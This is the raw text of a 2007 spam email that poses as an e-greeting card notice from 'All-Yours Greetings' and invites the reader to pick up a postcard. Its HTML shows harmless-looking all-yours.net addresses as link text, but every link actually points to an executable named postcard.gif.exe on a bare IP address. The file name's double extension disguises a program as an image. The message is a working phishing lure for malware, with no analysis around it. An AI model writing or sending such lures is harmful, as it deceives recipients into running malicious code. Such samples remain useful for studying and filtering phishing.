Subject: You have recived a greeting card from a friend!

From: "All-Yours Greetings"<[email-masked]>
Date: Thu, 12 Apr 2007 03:58:34 -0400

<HTML><HEAD><TITLE>all-yours.net</TITLE>
<META NAME="a">
<METAA NAME="description" content="a">
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY bgColor=#FFFFFF link=#000099 vLink=#FF0000>
<div align="center">
  <p align="left">&nbsp;
  <p align="left"><font color="#FF0000" size="2" face="Verdana">Hello , </font></p>
  <p align="left"><font color="#FFFFFF" size="2"
face="Verdana">.</font></p>
  <p align="left"><font color="#FF0000" size="2" face="Verdana">A Greeting Card is waiting for you at our virtual post office!
You can pick up your postcard at the following web address:
</font></p>
  <p align="left"><font color="#FFFFFF" size="2"
face="Verdana">.</font></p>
  <p align="left"><font size="3" face="Verdana"><A
href="http://202.67.156.214/postcard.gif.exe"
target=_blank><strong>http://www.all-yours.net/u/view.php?id=a0190313376667</strong></A></font></p>
  <p align="left"><font color="#FFFFFF" size="2"
face="Verdana">.</font></p>
  <p align="left"><font color="#FF0000" size="2" face="Verdana">If you
can't click on the web
    address above, you can also<br>
    visit E-Greetings at <a
href="http://202.67.156.214/postcard.gif.exe">http://www.all-yours.net/</a><br>
    and enter your pickup code, which is: <a
href="http://202.67.156.214/postcard.gif.exe">a0190313376667</a></font></p>
  <p align="left"><font color="#FFFFFF" size="2"
face="Verdana">.</font></p>
  <P align="left"><font color="#FF0000" size="2" face="Verdana">(Your
postcard will be available
    for 60 days.)</font></P>
  <P align="left"><font color="#FFFFFF" size="2"
face="Verdana">.</font></P>
  <p align="left"><font color="#FF0000" size="2" face="Verdana">Oh -- and
if you'd like to reply
    with a postcard,<br>
    you can do so by visiting this web address:<br>
    <a
href="http://202.67.156.214/postcard.gif.exe">http://www.all-yours.net/</a><br>
    (Or you can simply click the &quot;reply to this postcard&quot;<br>
    button beneath your postcard!)</font></p>
  <p align="left"><font color="#FFFFFF" size="2"
face="Verdana">.</font></p>
  <p align="left"><font color="#FF0000" size="2" face="Verdana">We hope
you enjoy your postcard,
    and if you do,<br>
    please take a moment to send a few yourself!</font></p>
  <p align="left"><font color="#FFFFFF" size="2"
face="Verdana">.</font></p>
  <p align="left"><font color="#FF0000" size="2"
face="Verdana">Regards,<br>
    1001 E-Greetings and Postcards<br>
    <a
href="http://202.67.156.214/postcard.gif.exe">http:///www.all-yours.net/</a></font></p>
  <font color="#FF0000" face="Verdana"></p> </font></div>
</BODY></HTML>